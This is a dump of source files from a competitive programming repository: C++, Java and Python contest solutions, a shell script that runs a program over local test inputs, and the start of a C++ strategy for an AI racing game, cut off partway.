"alpha_fraction": 0.3925538957118988, "alphanum_fraction": 0.4239059388637543, "avg_line_length": 21.202898025512695, "blob_id": "62a698848491175a57ec169ff9313a9baa5b5ee4", "content_id": "0bf5939887e2a9fb02b22c8badfdfd54042e8988", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1823, "license_type": "no_license", "max_line_length": 72, "num_lines": 69, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <vector>\n#include <iostream>\n#include <fstream>\n#include <cstdio>\n#include <stdio.h>\n#define ULL unsigned long long\nusing namespace std;\n \nULL F[18];\n \nULL num_by_perm(vector<int> v) {\n    if (v.size() == 2) {\n        return 0;\n    }\n    int n = v.size() / 2;\n    ULL ans = (v[1] - 2) * F[n - 1];\n    vector<int> cut;\n    for (int i = 2; i < v.size(); i++) {\n        if (v[i] > v[1])\n            cut.push_back(v[i] - 2);\n        else\n            cut.push_back(v[i] - 1);\n    }\n    return ans + num_by_perm(cut);\n}\n \nvector<int> perm_by_num(ULL num, int n) {\n    vector<int> ans(2 * n);\n    if (n == 1) {\n        ans[0] = 1;\n        ans[1] = 2;\n        return ans;\n    }\n    ans[0] = 1;\n    ans[1] = num / F[n - 1] + 2;\n    vector<int> cut = perm_by_num(num - (ans[1] - 2) * F[n - 1], n - 1);\n    for (int i = 0; i < cut.size(); i++) {\n        if (cut[i] + 1 < ans[1])\n            ans[i + 2] = cut[i] + 1;\n        else\n            ans[i + 2] = cut[i] + 2;\n    }\n    return ans;\n}\n \nvoid main(){\n    ifstream in(\"pairings.in\");\n    ofstream out(\"pairings.out\");\n    F[0] = 1;\n    for (int i = 1; i < 18; i++) {\n        F[i] = F[i - 1] * (2 * i - 1);\n    }\n    int n;\n    in >> n;\n    vector<int> v(2 * n);\n    for (int i = 0; i < n * 2; i++) {\n        in >> v[i];\n    }\n    ULL number = num_by_perm(v);\n    number = 2 * number + 1;\n    if (number >= F[n]) {\n        out << \"Already finished!\";\n        return;\n    }\n    v = perm_by_num(number, n);\n    for (int i = 0; i < v.size(); i++) {\n        out << v[i] << \" \";\n    }\n}" }, { "alpha_fraction": 0.38805970549583435, "alphanum_fraction": 0.39745715260505676, "avg_line_length": 18.89011001586914, "blob_id": "8f226d87fd6c037d310a9e82355f6b108b6514d0", "content_id": "c3a0bed1babd1b0ed3b5dc66fab4b1f23e61859f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1809, "license_type": "no_license", "max_line_length": 67, "num_lines": 91, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n \ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nstruct tri\n{\n ll x;\n bool f;\n int i;\n tri(ll x, bool a, int q)\n {\n this->x = x;\n f = a;\n i = q;\n }\n \n bool operator<(tri const& a) const\n {\n if (x != a.x)\n return x < a.x;\n return f > a.f;\n }\n};\n \nint main() {\n // freopen(\"in.in.c\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n ll m;\n cin >> n >> m;\n vector<tri> a;\n ll x;\n int y;\n fori(n)\n cin >> x >> y,\n a.pb(tri(x, y == 1, i + 1));\n sort(a.rbegin(), a.rend());\n // fori(n)\n // cout << a[i].x << \" \" << a[i].f << \" \" << a[i].i << \"\\n\";\n int i = 0;\n ll sum = 0;\n int count = 0;\n while (i < n && sum < m)\n count += a[i].f,\n sum += a[i++].x;\n \n \n int l = i - 1;\n int r = i;\n while (true){\n while (l + 1 && a[l].f)\n l--;\n while (r < n && !a[r].f)\n r++;\n // cout << l << \" \" << r << endl;\n if (l <= -1 || r >= n)\n break;\n if (!a[l].f && a[r].f && sum - a[l].x + a[r].x >= m){\n sum = sum - a[l].x + a[r].x;\n swap (a[l], a[r]);\n count++;\n l--;\n r++;\n }\n else\n break;\n }\n cout << i << \" \" << count << \"\\n\";\n forj(i)\n cout << a[j].i << \" \";\n return 0;\n}" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.4529411792755127, "avg_line_length": 11.142857551574707, "blob_id": "b7fa379fa43b4f2e9844006bd03dfbd91ffcdcc7", "content_id": "867a6f4c7d2ce8d46bd84df5b3e588f0aa86e055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/scripts/runJury.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "exe=$1\ndir=$2\n\nif [ ! \"$dir\" ]; then\n dir=\".\"\nfi\n\n\nfor i in $(seq 1 1000)\ndo\n if [ ! -f \"$dir/$i\" ]; then break; fi\n $exe < $dir/$i > $dir/$i.a\n echo $i\ndone\n" }, { "alpha_fraction": 0.45098039507865906, "alphanum_fraction": 0.529411792755127, "avg_line_length": 50, "blob_id": "e9807a2b1022349c8183dbd911d6590dd1f2e991", "content_id": "282b10006943c5eb093053eb292adbaa99ac4d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 50, "num_lines": 1, "path": "/CodeForce/1703/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "for s in[*open(0)][2::2]:print(len(s)+len({*s})-2)\n" }, { "alpha_fraction": 0.46086955070495605, "alphanum_fraction": 0.4859721064567566, "avg_line_length": 29.323383331298828, "blob_id": "5bd24a42505ea983139bfa46066f2bc0fc4f447c", "content_id": "fad303b35bcce0eeb0f342ce204f3c603e1722cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6095, "license_type": "no_license", "max_line_length": 165, "num_lines": 201, "path": "/CodeForce/0676/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nint xt, yt, xm, ym, n, m;\nvector<string> s;\nint d[5][1111][1111];\nvector<vector<char>> mp;\nmap<pii, bool> door[256];\n\nvector<pair<int, int>> get(char c) {\n switch(c)\n {\n case '+': return {{0, 0}, {1, 0}, {-1, 0}, {0, 1}, {0, -1}};\n case '-': return {{0, 0}, {1, 0}, {-1, 0}};\n case '|': return {{0, 0}, {0, 1}, {0, -1}};\n case '^': return {{0, 0}, {0, -1}};\n case '>': return {{0, 0}, {1, 0}};\n case '<': return {{0, 0}, {-1, 0}};\n case 'v': return {{0, 0}, {0, 1}};\n case 'L': return {{0, 0}, {1, 0}, {0, 1}, {0, -1}};\n case 'R': return {{0, 0}, {-1, 0}, {0, 1}, {0, -1}};\n case 'U': return {{0, 0}, {1, 0}, {-1, 0}, {0, 1}};\n case 'D': return {{0, 0}, {1, 0}, {-1, 0}, {0, -1}};\n default : return {};\n }\n}\n\nchar next(char c)\n{\n switch(c)\n {\n case '+': return '+';\n case '-': return '|';\n case '|': return '-';\n case '^': return '>';\n case '>': return 'v';\n case '<': return '^';\n case 'v': return '<';\n case 'L': return 'U';\n case 'R': return 'D';\n case 'U': return 'R';\n case 'D': return 'L';\n default : return '*';\n }\n}\n\nint wave(int i, int j, int mod, int ans)\n{\n queue<pair<pii, pii>> q;\n q.push({{i, j}, {mod, ans}});\n while (q.size())\n {\n tie(i, j) = q.front().first;\n tie(mod, ans) = q.front().second;\n //writeln(i, j, mod);\n q.pop();\n if (i == xm && j == ym)\n return d[mod][j][i];\n for (auto ddd : get(mp[s[j][i]][mod]))\n {\n int u = i + ddd.first;\n int v = j + ddd.second;\n int newmod = (mod + (u == i && v == j)) % 4;\n if (u == -1 || v == -1 || u == m || v == n || s[v][u] == '*')\n continue;\n if ((door[mp[s[v][u]][mod]][{-ddd.first, -ddd.second}] || ddd.first + ddd.second == 0) && d[newmod][v][u] == INF)\n {\n d[newmod][v][u] = d[mod][j][i] + 1;\n q.push({{u, v}, {newmod, ans + 1}});\n }\n\n }\n }\n return -1;\n}\n\nvoid run()\n{\n readln(n, m);\n s.resize(n);\n mp.resize(256);\n readln(s, yt, xt, ym, xm);--xt;--yt;--xm;--ym;\n fori(n)\n forj(m)\n forn(k, 4)\n d[k][i][j] = INF;\n d[0][yt][xt] = 0;\n string t = \"+-|^><vLRDU*\";\n for (char c : t)\n {\n char r = c;\n fori(4)\n mp[r].pb(c),\n c = next(c);\n }\n for (char c : t)\n for (auto ddd : get(c))\n door[c][ddd] = true;\n writeln(wave(xt, yt, 0, 0));\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5395683646202087, "alphanum_fraction": 0.5467625856399536, "avg_line_length": 22, "blob_id": "1c5db259a99d479eea9b0886bdedb79e260ac934", "content_id": "582fc719d963faf36dbb74a62a2c5430e03f365e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.20/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "task = 'elephants'\nf = open(task + '.in', 'r')\ng = open(task + '.out', 'w')\ng.write(\"SHALYTO\"[int(f.readline()) - 1])\ng.close()\nf.close()\n\n" }, { "alpha_fraction": 0.41429218649864197, "alphanum_fraction": 0.418815016746521, "avg_line_length": 21.110000610351562, "blob_id": "f8d596400fca060a6c427238b2755af5a611ece9", "content_id": "0fbd4b83f6201c1e62c27a5cc002e44258ab638d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 70, "num_lines": 100, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.28/A.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class A {\n \n final static String input = \"input.txt\";\n final static String output = \"output.txt\";\n \n public void run() {\n int n = nextInt(), m = 3;\n \n String[][] rnames = new String[n][m];\n \n for (int i = 0; i < n; i++) {\n for (int j = 0; j < m; j++) {\n rnames[i][j] = next();\n }\n }\n \n int[] p = new int[n];\n \n for (int i = 0; i < n; i++) {\n p[i] = nextInt() - 1;\n }\n \n String[][] names = new String[n][];\n for (int i = 0; i < n; i++) {\n names[i] = rnames[p[i]];\n }\n \n String[] ans = new String[n];\n \n String cur = \"\";\n \n for (int i = 0; cur != null && i < n; i++) {\n Arrays.sort(names[i]);\n \n for (int j = 0; j < m; j++) {\n if (cur.compareTo(names[i][j]) < 0) {\n ans[i] = names[i][j];\n break;\n }\n }\n cur = ans[i];\n }\n \n if (cur == null) {\n out.println(\"IMPOSSIBLE\");\n return;\n }\n \n for (int i = 0; i < n; i++) {\n out.println(ans[i]);\n }\n \n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n \n String nextLine() {\n try {\n return br.readLine();\n } catch (IOException e) {\n return null;\n }\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n st = new StringTokenizer(nextLine());\n }\n return st.nextToken();\n }\n \n static PrintWriter out;\n static BufferedReader br;\n static StringTokenizer st;\n \n public static void main(String[] arg) throws IOException {\n \n if (input == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(new File(input)));\n }\n \n if (output == null) {\n out = new PrintWriter(System.out);\n } else {\n out = new PrintWriter(new File(output));\n }\n \n new A().run();\n br.close();\n out.close();\n \n }\n}\n" }, { "alpha_fraction": 0.39961013197898865, "alphanum_fraction": 0.42105263471603394, "avg_line_length": 18, "blob_id": "913306f58b171c0b7d33a874d3bece1008f2299a", "content_id": "ae627d83513488abe7d957c6cf9b7197b33b9908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 42, "num_lines": 27, "path": "/2021/gcjQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def readln():\n return list(map(int, input().split()))\n\n\ndef run():\n [n, c] = readln()\n c -= n - 1\n\n a = [str(i + 1) for i in range(n)]\n b = [False for i in range(n)]\n for i in range(n - 1):\n if c >= n - i - 1:\n c -= n - i - 1\n b[i] = True\n\n if c != 0: return 'Impossible'\n\n for i in range(n - 1, -1, -1):\n if b[i]:\n a[i:n] = reversed(a[i:n])\n\n return ' '.join(a)\n\n\n[t] = readln()\nfor q in range(1, t + 1):\n print(f'Case #{q}: {run()}')\n" }, { "alpha_fraction": 0.38175907731056213, "alphanum_fraction": 0.405638188123703, "avg_line_length": 40.06583786010742, "blob_id": "529f0c2575b641534ffa17ae620afcfe69944ba9", "content_id": "d08f4f170488975dc7368f2155e1914fccccec50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 91836, "license_type": "no_license", "max_line_length": 634, "num_lines": 2172, "path": "/trains/ai/cpp-cgdk/old2.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\r\n\r\n\r\n\r\n\r\n//Не читайте этот код, у Вас вытекут глаза :(\r\n\r\n\r\n\r\n\r\n\r\n//Объезжалочка\r\n//Я умею говнокодить 2\r\n#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n#define go(p, a, b) { if (p) goto a; else goto b; }\r\n\r\n#include <bits/stdc++.h>\r\n//#ifdef ONLINE_JUDGE\r\n//#define debug 1\r\n//#endif\r\n#ifdef debug\r\n//#undef debug\r\n//#endif\r\n#include \"library.h\"\r\n#endif\r\n\r\n#ifdef vis\r\n#include \"Debug.h\"\r\nDebug visual;\r\n#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 90;\r\nint FORCE_BACK = 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 16;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\nint PLANB = 123456;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\ndouble eps = 5;\r\n\r\ndouble power = 1;\r\nbool changed = false;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\nbool init = true;\r\nbool snake = false;\r\nbool drift = false;\r\ndouble width;\r\ndouble height;\r\nint d = 0;\r\nint pd = 0;\r\nset<pair<int, int>> bad;\r\nvector<pair<int, int>> old;\r\nint planB = 0;\r\nvector<vector<bool>> visited;\r\nvector<vector<bool>> once;\r\n\r\nbool changedj = false;\r\ndouble distToNextij = -10000;\r\ndouble prevDistanceij = -10000;\r\nint countOfFailsj = 0;\r\nint forceBackj = 0;\r\nint forceRightj = 0;\r\nint forcej = 0;\r\nint prevxj = 0;\r\nint currxj = -1234;\r\nint forceSlowj = 0;\r\nint globalFailj = 0;\r\ndouble turnj = 0.0;\r\nbool initj = true;\r\nbool snakej = false;\r\nbool driftj = false;\r\ndouble widthj;\r\ndouble heightj;\r\nint dj = 0;\r\nint pdj = 0;\r\nset<pair<int, int>> badj;\r\nvector<pair<int, int>> oldj;\r\nint planBj = 0;\r\ndouble powerj = 1;\r\nvector<vector<bool>> visitedj;\r\nvector<vector<bool>> oncej;\r\n\r\n#define RIGHT 0\r\n#define UP 1\r\n#define LEFT 2\r\n#define DOWN 3\r\n\r\nvector<int> ddx = {1, 0, -1, 0};\r\nvector<int> ddy = {0, -1, 0, 1};\r\nmap<pair<int, int>, int> directions;\r\n\r\nvector<vector<vector<int>>> goforward = { /* сначала шли вправо*/ { { RIGHT, UP, DOWN, LEFT }, { RIGHT, UP, LEFT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, /*1 сначала шли вверх*/ { { UP, RIGHT, DOWN, LEFT }, { UP, LEFT, RIGHT, DOWN }, { UP, LEFT, DOWN, RIGHT }, { DOWN, LEFT, RIGHT, UP } }, /*2 сначала шли влево*/ { { RIGHT, UP, DOWN, LEFT }, { LEFT, UP, RIGHT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, /*3 сначала шли вниз*/ { { DOWN, RIGHT, UP, LEFT }, { UP, RIGHT, LEFT, DOWN }, { DOWN, LEFT, UP, RIGHT }, { DOWN, RIGHT, LEFT, UP } } }; //СНАЧАЛА ИДЕМ ПРЯМО ЕСЛИ МОЖЕМ\r\n\r\nvector<vector<vector<int>>> FUUUUU = {\r\n/*0 сначала шли вправо*/\r\n {\r\n //->\r\n {\r\n UP, DOWN, RIGHT, LEFT\r\n },\r\n //^\r\n {\r\n RIGHT, UP, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n UP, DOWN, LEFT, RIGHT\r\n },\r\n //V\r\n {\r\n RIGHT, DOWN, LEFT, UP\r\n }\r\n },\r\n/*1 сначала шли вверх*/ \r\n {\r\n //->\r\n {\r\n UP, RIGHT, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n LEFT, RIGHT, UP, DOWN\r\n },\r\n //<-\r\n {\r\n UP, LEFT, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n LEFT, RIGHT, DOWN, UP\r\n }\r\n },\r\n/*2 сначала шли влево*/ \r\n {\r\n //->\r\n {\r\n UP, DOWN, RIGHT, LEFT\r\n },\r\n //^\r\n {\r\n LEFT, UP, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n UP, DOWN, LEFT, RIGHT\r\n },\r\n //V\r\n {\r\n LEFT, DOWN, RIGHT, UP\r\n }\r\n },\r\n/*3 сначала шли вниз*/ \r\n {\r\n //->\r\n {\r\n DOWN, RIGHT, UP, LEFT\r\n },\r\n //^\r\n {\r\n RIGHT, LEFT, UP, DOWN\r\n },\r\n //<-\r\n {\r\n DOWN, LEFT, UP, RIGHT\r\n },\r\n //V\r\n {\r\n RIGHT, LEFT, DOWN, UP\r\n }\r\n }\r\n}, FU;\r\n\r\nint opposite(int x, int y)\r\n{\r\n return abs(x - y) == 2;\r\n}\r\n\r\nstruct vertex\r\n{\r\n int x, y, qd, qpd; \r\n vertex(){} \r\n vertex(int x, int y, int pd, int d) : x(x), y(y), qd(d), qpd(pd) {}\r\n};\r\n\r\ntemplate <typename T>\r\nvoid ppp(vector<vector<T>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n printf(\"\\n\");\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\ndouble getCenter(double xxx)\r\n{\r\n return (xxx + 0.5) * tileSize;\r\n}\r\n\r\ndouble get(double xxx)\r\n{\r\n return xxx * tileSize;\r\n}\r\n\r\ndouble get34(double xxx)\r\n{\r\n return (xxx + 0.9) * tileSize;\r\n}\r\n\r\ndouble get14(double xxx)\r\n{\r\n return (xxx + 0.1) * tileSize;\r\n}\r\n\r\nbool isVertical(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.first == b.first;\r\n}\r\n\r\nbool isHorizontal(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.second == b.second;\r\n}\r\n\r\nbool is32(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]))\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is3_2(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isVertical(a[1], a[4]) &&\r\n isHorizontal(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isHorizontal(a[1], a[4]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is212(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4]) &&\r\n isHorizontal(a[1], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]) &&\r\n isVertical(a[1], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is41(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is4(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 4)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is131(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\r\n else\r\n return make_pair(get(max(a.first, b.first)), getCenter(a.second));\r\n}\r\n\r\ndouble get(double x, double v)\r\n{\r\n return (x + v) * tileSize;\r\n}\r\n\r\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b, pair<int, int>& c)\r\n{\r\n // a\r\n //cbc\r\n double xxx = 0.25;\r\n if (isVertical(a, b))\r\n return make_pair(get(max(b.first, c.first)), get(b.second, a.second < b.second ? xxx : 1 - xxx));\r\n else\r\n // c\r\n // ab\r\n // c\r\n return make_pair(get(b.first, a.first < b.first ? xxx : 1 - xxx), get(max(b.second, c.second)));\r\n //if (isVertical(a, b))\r\n //return make_pair(c.first > b.first ? get14(a.first) : get34(a.first), a.second > b.second ? get14(b.second) : get34(b.second));\r\n //else\r\n //return make_pair(a.first < b.first ? get34(b.first) : get14(b.first), c.second > b.second ? get14(b.second) : get34(b.second));\r\n}\r\n\r\nint opposite(int x)\r\n{\r\n switch (x)\r\n {\r\n case LEFT:\r\n case RIGHT:\r\n return 2 - x;\r\n default:\r\n return 4 - x;\r\n }\r\n}\r\n\r\nbool isRightTo(pair<int, int> a, pair<int, int> b) // ba\r\n{\r\n return a.first - 1 == b.first && a.second == b.second;\r\n}\r\n\r\nbool isLeftTo(pair<int, int> a, pair<int, int> b) // ab\r\n{\r\n return a.first + 1 == b.first && a.second == b.second;\r\n}\r\n\r\nbool isUpTo(pair<int, int> a, pair<int, int> b) // ab\r\n{\r\n return a.first == b.first && a.second + 1 == b.second;\r\n}\r\n\r\nbool isDownTo(pair<int, int> a, pair<int, int> b) // ba\r\n{\r\n return a.first == b.first && a.second - 1 == b.second;\r\n}\r\n\r\nint getDirectionByAngle(double angle)\r\n{\r\n double sasdfasdf = PI / 9;\r\n if (fabs(angle) < sasdfasdf)\r\n return RIGHT;\r\n if (fabs(angle - PI / 2) < sasdfasdf)\r\n return DOWN;\r\n if (fabs(angle + PI / 2) < sasdfasdf)\r\n return UP;\r\n if (fabs(angle - PI) < sasdfasdf)\r\n return LEFT;\r\n if (fabs(angle + PI) < sasdfasdf)\r\n return LEFT;\r\n return -1;\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n //cout << (self.getType() == BUGGY ? \"BUGGY\\n\" : \"JEEP\\n\");\r\n if (self.getType() == BUGGY)\r\n {\r\n#ifdef vis\r\n visual.beginPre();\r\n#endif\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n if (init)\r\n {\r\n FU = goforward;\r\n //мне стало лень думать\r\n if (world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\")\r\n FUUUUU = goforward;\r\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\r\n //cout << self.getX() << \" \" << self.getY() << \"\\n\";\r\n init = false;\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n visited.resize(a.size());\r\n once.resize(a.size());\r\n for (int i = 0; i < visited.size(); ++i)\r\n visited[i].resize(a[0].size(), false),\r\n once[i].resize(a[0].size(), false);\r\n d = 